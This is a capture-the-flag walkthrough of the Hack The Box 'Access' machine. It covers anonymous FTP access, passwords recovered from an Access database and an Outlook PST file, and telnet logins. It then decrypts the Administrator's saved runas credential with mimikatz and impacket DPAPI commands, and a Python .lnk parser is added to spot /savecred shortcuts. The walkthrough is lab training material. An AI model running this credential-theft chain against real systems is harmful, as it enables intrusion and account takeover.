Access

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# nmap 10.129.23.31
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-21 11:00 EST
Nmap scan report for 10.129.23.31
Host is up (0.12s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds

1.2. ftp

┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# ftp 10.129.23.31
Connected to 10.129.23.31.
220 Microsoft FTP Service
Name (10.129.23.31:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> cd backups
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |******************************************************************************************|  5520 KiB  816.95 KiB/s    00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:06 (816.94 KiB/s)
ftp> cd ../engineer
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access Control.zip
local: Control.zip remote: Access
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |******************************************************************************************| 10870       31.34 KiB/s    00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (31.33 KiB/s)
ftp>

There is an .mdb file (a Microsoft Access database) and a zip archive.
A password was found in the auth_user table:

admin
access4u@security

Conveniently, the zip archive is encrypted:

┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# file Access\ Control.zip
Access Control.zip: Zip archive data, made by v2.0, extract using at least v2.0, last modified Aug 24 2018 01:13:52, uncompressed size 271360, method=AES Encrypted

Extracting it with the password access4u@security yields an Access Control.pst file:

┌──(root㉿kali)-[~/Desktop/htb/Access/aceess]
└─# ls
'Access Control.pst'

.pst is an Outlook data file.

An online viewer is enough to browse the mail data here, e.g. the GoldFynch PST viewer. It contains one message:

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

1.3. telnet

This gives us a credential: security / 4Cc3ssC0ntr0ller.
The target's telnet service requires authentication.

┌──(root㉿kali)-[~/Desktop/htb/Access/aceess]
└─# telnet 10.129.23.31
Trying 10.129.23.31...
Connected to 10.129.23.31.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

2. system

2.1. ZKTeco

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\

08/23/2018  10:05 PM    <DIR>          inetpub
07/14/2009  03:20 AM    <DIR>          PerfLogs
08/23/2018  08:53 PM    <DIR>          Program Files
08/24/2018  07:40 PM    <DIR>          Program Files (x86)
08/24/2018  07:39 PM    <DIR>          temp
08/21/2018  10:31 PM    <DIR>          Users
07/14/2021  01:04 PM    <DIR>          Windows
>>>> 08/22/2018  07:23 AM    <DIR>          ZKTeco
               0 File(s)              0 bytes
               8 Dir(s)   3,343,654,912 bytes free

There is a ZKTeco directory in the root of C:, which is unusual.

Let's look through the directories.

C:\Users\Public>dir /s /a
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Users\Public

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
08/28/2018  06:51 AM    <DIR>          Desktop
07/14/2009  04:57 AM               174 desktop.ini
07/14/2009  05:06 AM    <DIR>          Documents
07/14/2009  04:57 AM    <DIR>          Downloads
07/14/2009  02:34 AM    <DIR>          Favorites
07/14/2009  04:57 AM    <DIR>          Libraries
07/14/2009  04:57 AM    <DIR>          Music
07/14/2009  04:57 AM    <DIR>          Pictures
07/14/2009  04:57 AM    <DIR>          Videos
               1 File(s)            174 bytes

 Directory of C:\Users\Public\Desktop

08/28/2018  06:51 AM    <DIR>          .
08/28/2018  06:51 AM    <DIR>          ..
07/14/2009  04:57 AM               174 desktop.ini
>>>> 08/22/2018  09:18 PM             1,870 ZKAccess3.5 Security System.lnk
               2 File(s)          2,044 bytes

 Directory of C:\Users\Public\Documents

07/14/2009  05:06 AM    <DIR>          .
07/14/2009  05:06 AM    <DIR>          ..
07/14/2009  04:57 AM               278 desktop.ini
07/14/2009  05:06 AM    <JUNCTION>     My Music [C:\Users\Public\Music]
07/14/2009  05:06 AM    <JUNCTION>     My Pictures [C:\Users\Public\Pictures]
07/14/2009  05:06 AM    <JUNCTION>     My Videos [C:\Users\Public\Videos]
               1 File(s)            278 bytes

 Directory of C:\Users\Public\Downloads

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM               174 desktop.ini
               1 File(s)            174 bytes

 Directory of C:\Users\Public\Favorites

07/14/2009  02:34 AM    <DIR>          .
07/14/2009  02:34 AM    <DIR>          ..
               0 File(s)              0 bytes

 Directory of C:\Users\Public\Libraries

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM                88 desktop.ini
07/14/2009  04:57 AM               876 RecordedTV.library-ms
               2 File(s)            964 bytes

 Directory of C:\Users\Public\Music

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM               380 desktop.ini
07/14/2009  04:57 AM    <DIR>          Sample Music
               1 File(s)            380 bytes

 Directory of C:\Users\Public\Music\Sample Music

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM               174 desktop.ini
               1 File(s)            174 bytes

 Directory of C:\Users\Public\Pictures

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM               380 desktop.ini
07/14/2009  04:57 AM    <DIR>          Sample Pictures
               1 File(s)            380 bytes

 Directory of C:\Users\Public\Pictures\Sample Pictures

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM               174 desktop.ini
               1 File(s)            174 bytes

 Directory of C:\Users\Public\Videos

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM               380 desktop.ini
07/14/2009  04:57 AM    <DIR>          Sample Videos
               1 File(s)            380 bytes

 Directory of C:\Users\Public\Videos\Sample Videos

07/14/2009  04:57 AM    <DIR>          .
07/14/2009  04:57 AM    <DIR>          ..
07/14/2009  04:57 AM               174 desktop.ini
               1 File(s)            174 bytes

     Total Files Listed:
              13 File(s)          5,296 bytes
              38 Dir(s)   3,343,654,912 bytes free

There is an .lnk file; let's have a look at it.

C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
LF@ 7#P/PO :+00/C:\R1M:Windows:M:*wWindowsV1MVSystem32:MV*System32X2P:
                                                                       runas.exe:1:1*Yrunas.exeL-KEC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%
                       wN]ND.Q`Xaccess_8{E3
                                           Oj)H
                                               )ΰ[_8{E3
                                                       Oj)H
                                                           )ΰ[  1SPSXFL8C&me*S-1-5-21-953262931-566350628-63446256-500

runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred
From this command line we can see that the Administrator's credentials have been saved (/savecred).
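The .lnk file is a binary MS-SHLLINK structure, so `type` only exposes the embedded strings. A small parser makes this check repeatable across a host: the following is an added example, not code from the writeup; it walks the ShellLinkHeader, skips the IDList and LinkInfo blocks, returns the StringData fields, and flags shortcuts that launch runas.exe with /savecred. The function names and the builder are mine, and the sample values in the builder mirror the shortcut above.

```python
import struct

HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80   # LinkFlags bits
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40))         # StringData order
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

def parse_lnk(data):
    """Return the StringData fields of a .lnk file (name, relative_path, working_dir,
    arguments, icon_location), skipping the IDList and LinkInfo structures."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C or data[4:20] != SHELL_LINK_CLSID:
        raise ValueError("not a shell link file")
    flags, = struct.unpack_from("<I", data, 20)
    off = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:               # IDListSize (2 bytes) + IDList
        id_list_size, = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                         # LinkInfoSize is its first field
        link_info_size, = struct.unpack_from("<I", data, off)
        off += link_info_size
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, off)  # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252")
            off += count
    return fields

def uses_saved_credentials(fields):
    """True when the shortcut runs runas.exe with /savecred (a stored Credential Manager password)."""
    target = (fields.get("relative_path", "") + " " + fields.get("name", "")).lower()
    return "runas" in target and "/savecred" in fields.get("arguments", "").lower()

def build_lnk(relative_path, working_dir, arguments, icon_location):
    """Constructed minimal unicode .lnk with an empty IDList, used to test the parser."""
    flags = HAS_LINK_TARGET_ID_LIST | IS_UNICODE | sum(bit for _, bit in STRING_FIELDS[1:])
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, SHELL_LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\0\0"          # IDListSize=2: only the TerminalID
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments, icon_location))
    return header + id_list + strings
```

Run `parse_lnk(open(path, "rb").read())` over every .lnk under the Public and per-user Desktop folders to find shortcuts that depend on saved credentials.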

2.2. DPAPI

We can try decrypting the DPAPI-protected credential.

First, obtain the master key. The relevant files live under the user's profile:

# master key file
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SID\$GUID
# credential blob
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\

Following 0xdf's approach, encode the files with certutil and view them as text; they could also be transferred via ftp.

C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 output
Input Length = 468
Output Length = 700
CertUtil: -encode command completed successfully.

Next, get the encrypted blob the same way:

C:\Users\security\AppData\Roaming\Microsoft\Credentials>certutil -encode 51AB168BE4BDB3A603DADE4F8CA81290 output
Input Length = 538
Output Length = 800
CertUtil: -encode command completed successfully.

C:\Users\security\AppData\Roaming\Microsoft\Credentials>dir
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Users\security\AppData\Roaming\Microsoft\Credentials

11/21/2025  04:52 PM               800 output
               1 File(s)            800 bytes
               0 Dir(s)   3,343,921,152 bytes free

Then decrypt it locally.

2.2.1. Method 1: mimikatz

mimikatz # dpapi::masterkey /in:master_key /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 9c51ca4d00708c73d4fbff60b95e549e
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 4bb6dd9b5b9656d97b78f114796457f4
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {009668e5-9305-401b-ba0d-dfa0e11b34d0}



[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
  key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
  sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe

Then decrypt the blob with the master key now cached in mimikatz's memory:

mimikatz # dpapi::cred /in:blob
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
  dwDataLen          : 00000100 - 256
  pbData             : (256-byte hex value omitted)
  dwSignLen          : 00000040 - 64
  pbSign             : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99

Decrypting Credential:
 * volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000f4 - 244
  credUnk0       : 00002004 - 8196

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 2018/8/22 21:18:49
  unkFlagsOrSize : 00000038 - 56
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=ACCESS\Administrator
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : ACCESS\Administrator
>>>>   CredentialBlob : 55Acc3ssS3cur1ty@megacorp
  Attributes     : 0

Log in to the Administrator account with that password:

┌──(root㉿kali)-[~/Desktop/htb/Access/aceess]
└─# telnet 10.129.23.31
Trying 10.129.23.31...
Connected to 10.129.23.31.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: administrator
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================

C:\Users\Administrator>cd desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Users\Administrator\Desktop

07/14/2021  02:40 PM    <DIR>          .
07/14/2021  02:40 PM    <DIR>          ..
11/21/2025  04:00 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,343,921,152 bytes free

C:\Users\Administrator\Desktop>type root.txt
266ee379769c78f68bc3b47a613fc264

2.2.2. Method 2: impacket-dpapi

Decrypt the master key:

┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# impacket-dpapi masterkey -file master_key -sid S-1-5-21-953262931-566350628-63446256-1001 -password 4Cc3ssC0ntr0ller
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 0792c32e-48a5-4fe3-8b43-d93d64590580
Flags       :        5 (5)
Policy      :        0 (0)
MasterKeyLen: 000000b0 (176)
BackupKeyLen: 00000090 (144)
CredHistLen : 00000014 (20)
DomainKeyLen: 00000000 (0)

Decrypted key with User Key (SHA1)
Decrypted key: 0xb360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2

Use the master key to decrypt the blob:

┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# impacket-dpapi credential -file blob -key 0xb360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2018-08-22 21:18:49+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:interactive=ACCESS\Administrator
Description :
Unknown     :
Username    : ACCESS\Administrator
>>>> Unknown     : 55Acc3ssS3cur1ty@megacorp